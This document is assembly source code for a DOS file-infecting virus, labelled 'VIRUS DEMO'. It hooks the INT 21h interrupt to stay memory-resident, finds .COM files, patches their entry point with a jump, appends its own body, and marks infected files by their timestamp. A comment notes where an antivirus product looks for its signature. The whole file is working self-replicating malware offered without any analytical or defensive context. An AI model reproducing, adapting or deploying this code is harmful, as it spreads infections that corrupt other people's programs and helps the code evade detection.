
;*****************************************************************************
;		 VIRUS  DEMO (older ver not destructive do not change attr
;			      found by tsafe)
;-----------------------------------------------------------------------------

len	equ	023ah
plen	equ	007bh
cplace  equ	9800h

;-----------------------------------------------------------------------------
;    				FIND FIRST FILE
;-----------------------------------------------------------------------------
jmp	con

; check if a virusing operation required.

cmp	ah,3dh ;open file
je	con
cmp	ah,0fh ;open file
je 	con
cmp     ah,4bh ;exec!!!
je	con
cmp 	ah,0eh ;select disk
je	con
cmp 	ah,5bh ;create file
je	con
cmp	ah,16h ;create file
je	con
cmp	ah,3ch ;create file
je	con
cmp	ah,41h ;delete file
je 	con
cmp	ah,13h ;delete file
je	con
cmp	ah,56h ;rename file
je	con
cmp	ah,17h ;rename file
je	con


; end of check


int	6bh
iret


con:	push	ax
push	bx
push	cx
push 	es
push	ds
push	dx


mov	ah,1ah
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
int	6bh

mov	ah,4eh
mov	cx,0
mov	dx,cs
mov	ds,dx
mov	dx,offset fname
int	6bh
jc	error1



;----------------------------------------------------------------------------
;		CHECK THE TIME OF FILE TO SEE IF IT IS  31*2 SEC
;----------------------------------------------------------------------------

lfnd: mov ax,word ptr buff+16h
and ax,31
cmp ax,31
jne maketim	;if time not 31 make time 31 and continue
 
; find next .com file

mov ah,4fh
int 6bh
jc error1
jmp lfnd


;
maketim:	mov ax,word ptr buff+16h
and ax,65504	;zero 5 firsty bits
add ax,31
mov word ptr buff+16h,ax	; put the fixed date





; find file size

;mov ax,word ptr buff+1ah



; open the file

mov	ah,3dh
mov	al,2
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,30
int	6bh
jc	error1
mov	fhandle,ax





;------------------------------------
;	close
;-----------------------------------

jmp	cont

;-----------------------------------------------------------------------------
;		NOT	FAR	ERROR (here mcafee searches for the string)
;-----------------------------------------------------------------------------

error1: jmp error

;-----------------------------------------------------------------------------
;                PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------


cont:	mov ax,word ptr buff+1ah    ; ax=the file size
sub ax,3	;find the disp for the jump code
mov	buff+1,al
mov	buff+2,ah
mov	ax,00e8h
mov	buff,al

;-----------------------------------------------------------------------------
;		READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------

mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


mov	ah,3fh
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,3
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error1
cmp	ax,cx
jl	error1


;-----------------------------------------------------------------------------
;			MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------

mov	al,buff+3
mov	dat1,al
mov	al,buff+4
mov	dat2,al
mov	al,buff+5
mov	dat3,al

;-----------------------------------------------------------------------------
; 		WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------


mov	ah,42h
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error
cmp	ax,3
jne	error


;-----------------------------------------------------------------------------
;	CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------

mov ax,word ptr buff+1ah
add	ax,100h
add	ax,plen
mov	sdat1,al
mov	sdat1+1,ah

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------

mov	ah,42h
mov	al,2
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,offset data
mov	bx,fhandle
mov	cx,plen
int	6bh
jc	error
cmp	ax,plen
jne	error


;----------------------------------------------------------------------------
;
;----------------------------------------------------------------------------

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,0100h
mov	bx,fhandle
mov	cx,len
int	6bh
jc	error
cmp	ax,len
jne	error


;-----------------------------------------------------------------------------
;			set old date again + fixed time
;-----------------------------------------------------------------------------

mov ah,57h
mov al,01h
mov bx,fhandle
mov cx,word ptr buff+16h
mov dx,word ptr buff+18h
int 6bh

;-----------------------------------------------------------------------------
;			CLOSE FILE
;-----------------------------------------------------------------------------

error:	mov	ah,3eh
mov	bx,fhandle
int	6bh


;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS TO DISK
;-----------------------------------------------------------------------------

pop	dx
pop	ds
pop	es
pop	cx
pop	bx
pop	ax

int	6bh

iret




;*****************************************************************************
;  				DATA SECTION
;-----------------------------------------------------------------------------

buff	db	43 dup (0)
fname	db	"*.COM",0

fhandle dw	?


data	db	198,6,0,1
dat1	db	0
datb	db	198,6,1,1
dat2	db	0
datc	db	198,6,2,1
dat3	db	0


pop	bx	;change the call data to 100h
mov	bx,100h
push	bx

; push all registeres

push	ax
push	dx
push	ds

;-----------------------------------------------------------------------------
;			check if virus is already in MEMORY
;	if it is, use the one in memory
;-----------------------------------------------------------------------------

push ds
mov ax,0
mov ds,ax
mov ax,[413h]
mov bx,40h
mul bx
sub ax,867h
mov cx,ax
mov ax,[86h]
pop ds
cmp ax,cx
je  ggo
push cx

;

mov 	cx,len
source	db	190	;MOV SI,OFFSET SOURCE
sdat1	db	0,0
mov 	di,100h
push	cs
pop	ds
pop	es ;cplace-> now 9800h
cld
rep movsb



;--------------------------------------------------------------------------
;		PUT INT 21H VECT. TO int 6bh
;--------------------------------------------------------------------------
push	ds
mov	ax,0
mov	ds,ax
push 	[84h]
pop     [1ach]

push	[85h]
pop	[1adh]

push	[86h]
pop	[1aeh]

push	[87h]
pop	[1afh]

;------------------------------------------------------------------------
;		HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------


; hook the virus
mov	ax,102h
mov	[84h],ax
mov	[86h],es ;put cplace
pop	ds

;-----------------------------------------------------------------------
;
;-----------------------------------------------------------------------
ggo:	 mov	ah,0fh
int	21h

; pop all registeres
pop ds
pop dx
pop ax

ret
